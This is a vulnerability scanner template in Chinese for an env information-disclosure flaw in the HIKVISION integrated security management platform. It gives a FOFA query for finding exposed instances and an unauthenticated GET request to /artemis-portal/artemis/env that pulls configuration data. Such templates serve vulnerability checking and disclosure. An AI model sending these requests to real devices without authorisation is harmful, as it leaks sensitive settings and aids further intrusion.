漏洞描述
HIKVISION 综合安防管理平台存在信息泄漏漏洞,攻击者通过漏洞可以获取环境env等敏感消息进一步攻击
FOFA: app="HIKVISION-综合安防管理平台"
id: hikvision-af-env-info-disclosure
info:
name: HiKVISION 综合安防管理平台 env 信息泄漏漏洞
author: peiqi
severity: high
verified: true
description: |
HIKVISION 综合安防管理平台存在信息泄漏漏洞,攻击者通过漏洞可以获取环境env等敏感消息进一步攻击
FOFA: app="HIKVISION-综合安防管理平台"
reference:
- https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20综合安防管理平台%20env%20信息泄漏漏洞.html
tags: hikvision,disclosure
created: 2023/08/10
rules:
r0:
request:
method: GET
path: /artemis-portal/artemis/env
expression: response.status == 200 && response.body.bcontains(b'"profiles":') && response.body.bcontains(b'"server.ports":')
expression: r0()